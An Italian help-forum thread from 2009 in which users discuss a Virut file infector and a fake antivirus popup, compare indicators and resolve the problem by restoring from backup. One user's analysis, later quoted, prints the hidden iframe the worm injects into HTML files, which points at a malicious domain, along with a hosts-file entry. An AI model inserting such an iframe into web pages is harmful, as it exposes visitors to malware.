Torna indietro   Hardware Upgrade Forum > Networking e sicurezza > Antivirus e Sicurezza > Aiuto sono infetto! Cosa faccio?

OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum
OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum
Abbiamo partecipato all'OVHcloud Summit 2025, conferenza annuale in cui l'azienda francese presenta le sue ultime novità. Abbiamo parlato di cloud pubblico e privato, d'intelligenza artificiale, di computer quantistici e di sovranità. Che forse, però, dovremmo chiamare solo "sicurezza"
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a
Abbiamo potuto mettere le mani in anteprima sul nuovo monitor MSI dedicato ai giocatori: un mostro che adotta un pannello QD-OLED da 26,5 pollici con risoluzione 2560 x 1440 pixel, frequenza di aggiornamento fino a 500 Hz e tempo di risposta di 0,03 ms GtG
DJI Neo 2 in prova: il drone da 160 grammi guadagna il gimbal e molto altro
DJI Neo 2 in prova: il drone da 160 grammi guadagna il gimbal e molto altro
DJI aggiorna la sua linea di droni ultraleggeri con Neo 2, un quadricottero da 160 grammi che mantiene la compattezza del predecessore ma introduce una stabilizzazione meccanica a due assi, sensori omnidirezionali e un sistema LiDAR
Tutti gli articoli Tutte le news

Vai al Forum
Rispondi
 
Strumenti
Old 30-11-2009, 12:44   #1
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Caso disperato?

Sabato si apre la finestra di Secure Antivirus Pro dicendomi che il mio pc è infetto.

Seguo le istruzioni di "Guida alla disinfezione" e per tutti i file *.exe mi viene segnalato che sono infetti e pertanto non parte nulla.

Sembra che l'unica cosa che funziana sia Firefox.

Ho provato a downloadare pgm per la rilevazione/rimozione. Tutto OK in fase di download ma, quando clicco per installare, mi viene segnalato che è infetto.

Ho provato a scaricarlo da altro pc sulla chiavetta, ma quando richiamo l'installazione mi dice che il file sulla chiavetta è infetto.

Ho provato con i programmi che non necessitano di installazione, ma evidentemente qualcosa installano lo stesso, è mi dice che è infetto.

Ho provato a rimetterlo in rete con l'altro pc (controllato e pulito) e far partire l'installazione mi dice che è infetto.

La cosa strana è che sul pc infetto sono installati dei programmi che, dall'altro pc partono con un link, ebbene se parto con il pc infetto mi dice che il programma è infetto, se parto con il link dall'altro pc funziona tutto.

Cosa posso fare?
dore2009 è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 12:49   #2
Chill-Out
Moderatore
 
L'Avatar di Chill-Out
 
Iscritto dal: Jun 2007
Città: 127.0.0.1
Messaggi: 25885
Ciao e benvenuto, tutti gli .*exe sono percaso infetti da Virut?
__________________
Try again and you will be luckier.
Chill-Out è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 13:17   #3
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Si Chill-Out.
Almeno così mi dice l'avviso.
dore2009 è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 13:49   #4
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
Quote:
Originariamente inviato da dore2009 Guarda i messaggi
Si Chill-Out.
Almeno così mi dice l'avviso.
potresti includere alcuni di questi eseguibili infetti in un archivio zippato con password e mandarmelo?
così provo a girarlo a eraser che è un ricercatore di Prevx e vediamo se riescono a regalarci un tool per disinfettare il pc
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 15:52   #5
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Sul pc infetto anche winzip non funziona.
Ho copiato alcuni file in Dir\TMP e con il pc sano li ho zippati. Non capisco però come devo fare a inviarli
dore2009 è offline   Rispondi citando il messaggio o parte di esso
Old 30-11-2009, 23:48   #6
xcdegasp
Senior Member
 
L'Avatar di xcdegasp
 
Iscritto dal: Nov 2001
Città: Fidenza(pr) da Trento
Messaggi: 27479
Quote:
Originariamente inviato da dore2009 Guarda i messaggi
Sul pc infetto anche winzip non funziona.
Ho copiato alcuni file in Dir\TMP e con il pc sano li ho zippati. Non capisco però come devo fare a inviarli
grazie, ricevuti
xcdegasp è offline   Rispondi citando il messaggio o parte di esso
Old 01-12-2009, 10:34   #7
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
...presumo una variante della versione diffusa tra 2008 e prima meta' 2009

Anch'io ho un pc con questo worm; ho fatto un'analisi sommaria di due tra i vari files che Avira Antivir PE mi segnala come infetti (li ho appena spediti ad eraser).

Se puo' essere utile alla causa:

1) questo e' il responso di Virustotal:

http://www.virustotal.com/it/analisi...ee9-1259655878

http://www.virustotal.com/it/analisi...f31-1259655922

2) nella prima riga del file hosts ho trovato questo:
127.0.0.1 jL.chura.pl

3) il file C:\Programmi\Mozilla Firefox\res\HiddenWindow.html (ed anche molti altri files html presenti sul pc, tra cui C:\WINDOWS\pchealth\helpctr\System\panels\NavBar.htm che a causa di questo era diventato grande piu' di 20 MB, ripuliti col cleaner di Grisoft http://free.avg.com/us-en/virus-removal.ndi-67762) era stato alterato con questa stringa ripetitiva:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4) da un diff fatto con WinMerge tra i files infetti e una copia presa da un pc pulito mi pare che le modifiche del worm risiedano nella parte finale dei files infetti (come per la sua variante precedente AFAIR, per la quale avevo usato DrWeb CureIT con esito positivo, mentre stavolta ha fatto completamente cilecca, come dimostra anche Virustotal)
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 01-12-2009, 13:49   #8
wjmat
Senior Member
 
L'Avatar di wjmat
 
Iscritto dal: Dec 2007
Città: Brianza
Messaggi: 14704
Quote:
Originariamente inviato da 12pippopluto34 Guarda i messaggi
Anch'io ho un pc con questo worm; ho fatto un'analisi sommaria di due tra i vari files che Avira Antivir PE mi segnala come infetti (li ho appena spediti ad eraser).

Se puo' essere utile alla causa:

1) questo e' il responso di Virustotal:

http://www.virustotal.com/it/analisi...ee9-1259655878

http://www.virustotal.com/it/analisi...f31-1259655922

2) nella prima riga del file hosts ho trovato questo:
127.0.0.1 jL.chura.pl

3) il file C:\Programmi\Mozilla Firefox\res\HiddenWindow.html (ed anche molti altri files html presenti sul pc, tra cui C:\WINDOWS\pchealth\helpctr\System\panels\NavBar.htm che a causa di questo era diventato grande piu' di 20 MB, ripuliti col cleaner di Grisoft http://free.avg.com/us-en/virus-removal.ndi-67762) era stato alterato con questa stringa ripetitiva:
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>

4) da un diff fatto con WinMerge tra i files infetti e una copia presa da un pc pulito mi pare che le modifiche del worm risiedano nella parte finale dei files infetti (come per la sua variante precedente AFAIR, per la quale avevo usato DrWeb CureIT con esito positivo, mentre stavolta ha fatto completamente cilecca, come dimostra anche Virustotal)
ciao

stai ancora cercando di ripulire o hai già preferito formattare?
wjmat è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 14:46   #9
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
Quote:
Originariamente inviato da wjmat Guarda i messaggi
ciao

stai ancora cercando di ripulire o hai già preferito formattare?
Ciao.

No, ancora non ci ho messo le mani, in quanto comunque, pur messa cosi', la macchina funziona perfettamente; pero', stando cosi' le cose, penso che la formattero' quanto prima.

Rimango comunque in attesa, perche' il ripristino di quel pc per me sarebbe alquanto laborioso ed avrei anche pochissimo tempo a disposizione.
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 15:54   #10
wjmat
Senior Member
 
L'Avatar di wjmat
 
Iscritto dal: Dec 2007
Città: Brianza
Messaggi: 14704
se non hai tempo da perdere meglio formattare in questo caso
wjmat è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 16:01   #11
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
Quote:
Originariamente inviato da wjmat Guarda i messaggi
se non hai tempo da perdere meglio formattare in questo caso
Il problema e' che per intervenire via software posso solamente farlo al max da "Modalita Provvisiona con Rete", perche' dall'altra parte non ho qualcuno che possa usare strumenti come live-cd vari consentendomi di controllare da remoto la macchina; piu' che altro poi avrei proprio poco tempo per formattare e ripristinare tutta la configurazione del pc, per cui se c'e' una soluzione fattibile via VNC senza dover avere a portata di mano cdrom di avvio e/o di ripristino e quant'altro, potrei anche intervenire.
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 02-12-2009, 16:26   #12
wjmat
Senior Member
 
L'Avatar di wjmat
 
Iscritto dal: Dec 2007
Città: Brianza
Messaggi: 14704
potrei anche linkare dei tool specifici ma che comunque non risolvono a completamente il problema
ammesso di disinfettare parte dei file ne rimarrebbero sicuramente altri di sistema che sarebbero da rimpiazzare manualmente con un cd/usb avviabile
wjmat è offline   Rispondi citando il messaggio o parte di esso
Old 03-12-2009, 01:27   #13
12pippopluto34
Senior Member
 
L'Avatar di 12pippopluto34
 
Iscritto dal: Mar 2004
Messaggi: 861
Quote:
Originariamente inviato da wjmat Guarda i messaggi
potrei anche linkare dei tool specifici ma che comunque non risolvono a completamente il problema
ammesso di disinfettare parte dei file ne rimarrebbero sicuramente altri di sistema che sarebbero da rimpiazzare manualmente con un cd/usb avviabile
Quello che non mi e' chiaro pero' e' come mai ancora quasi tutti gli antivirus tardano nel prendere contromisure, considerando che questo worm e' una variante e che non provoca, da quel che vedo, profonde modifiche sugli eseguibili, tanto che gli stessi funzionano comunque.
__________________
S’i’ fosse fuoco, arderei ‘l mondo;
s’i’ fosse vento, lo tempestarei,
s’i’ fosse acqua, i’ l’annegherei;
s’i’ fosse Dio, mandereil’ en profondo.
12pippopluto34 è offline   Rispondi citando il messaggio o parte di esso
Old 03-12-2009, 02:39   #14
eraser
Senior Member
 
L'Avatar di eraser
 
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6395
Quote:
Originariamente inviato da 12pippopluto34 Guarda i messaggi
Quello che non mi e' chiaro pero' e' come mai ancora quasi tutti gli antivirus tardano nel prendere contromisure, considerando che questo worm e' una variante e che non provoca, da quel che vedo, profonde modifiche sugli eseguibili, tanto che gli stessi funzionano comunque.
Qualsiasi file infector mantiene (o teoricamente dovrebbe, salvo poi corrompere il file per del codice scritto male) il file infetto funzionante. Ciò non significa però che sia facile poi riuscire a scindere il codice del virus da quello del file ospite
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio ::
eraser è offline   Rispondi citando il messaggio o parte di esso
Old 03-12-2009, 02:40   #15
eraser
Senior Member
 
L'Avatar di eraser
 
Iscritto dal: Nov 2001
Città: Bastia Umbra (PG)
Messaggi: 6395
Quote:
Originariamente inviato da xcdegasp Guarda i messaggi
potresti includere alcuni di questi eseguibili infetti in un archivio zippato con password e mandarmelo?
così provo a girarlo a eraser che è un ricercatore di Prevx e vediamo se riescono a regalarci un tool per disinfettare il pc
Ho ricevuto la tua e-mail, ma quei file sono puliti Non c'è traccia di Virut all'interno
__________________
:: Il miglior argomento contro la democrazia è una conversazione di cinque minuti con l'elettore medio ::
eraser è offline   Rispondi citando il messaggio o parte di esso
Old 04-12-2009, 15:50   #16
dore2009
Junior Member
 
Iscritto dal: Nov 2009
Messaggi: 5
Quote:
Originariamente inviato da eraser Guarda i messaggi
Ho ricevuto la tua e-mail, ma quei file sono puliti Non c'è traccia di Virut all'interno
Ho risolto facendo il restore del disco backuppato 2 giorni prima su un HD formattato.
Grazie lo stesso.
dore2009 è offline   Rispondi citando il messaggio o parte di esso
 Rispondi


OVHcloud Summit 2025: le novità del cloud europeo tra sovranità, IA e quantum OVHcloud Summit 2025: le novità del cloud...
Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI Care e DisplayPort 2.1a Un mostro da MSI: QD-OLED WQHD a 500 Hz con AI C...
DJI Neo 2 in prova: il drone da 160 grammi guadagna il gimbal e molto altro DJI Neo 2 in prova: il drone da 160 grammi guada...
L'IA "seria" di Appian è diversa: inserita nei processi e rispetta dati e persone L'IA "seria" di Appian è divers...
Polestar 3 Performance, test drive: comodità e potenza possono convivere Polestar 3 Performance, test drive: comodit&agra...
Giorgia Meloni 'una di noi': Palazzo Chi...
Airbus richiama oltre 6.000 A320: rischi...
Tra open hybrid cloud e sovranità...
Il nuovo SSD Samsung è fatto con ...
Russia contro WhatsApp: il piano per spe...
Battlefield 6, oltre 2,39 milioni di ten...
La Cina spiazza tutti: nuovo chip per l'...
Nexperia, altro che caso chiuso: il caos...
Nuova tecnologia AMD FSR Ray Regeneratio...
Motorola Edge 60 Neo e Motorola Moto Wat...
Weekend e offerte Amazon Black Friday ag...
Il tuo indirizzo IP è compromesso...
Eureka J15 Evo Ultra in super sconto: or...
Robot aspirapolvere in super sconto per ...
Black Friday Amazon: le migliori occasio...
Chromium
GPU-Z
OCCT
LibreOffice Portable
Opera One Portable
Opera One 106
CCleaner Portable
CCleaner Standard
Cpu-Z
Driver NVIDIA GeForce 546.65 WHQL
SmartFTP
Trillian
Google Chrome Portable
Google Chrome 120
VirtualBox
Tutti gli articoli Tutte le news Tutti i download

Strumenti

Regole
Non Puoi aprire nuove discussioni
Non Puoi rispondere ai messaggi
Non Puoi allegare file
Non Puoi modificare i tuoi messaggi

Il codice vB è On
Le Faccine sono On
Il codice [IMG] è On
Il codice HTML è Off
Vai al Forum


Tutti gli orari sono GMT +1. Ora sono le: 05:19.


Powered by vBulletin® Version 3.6.4
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Served by www3v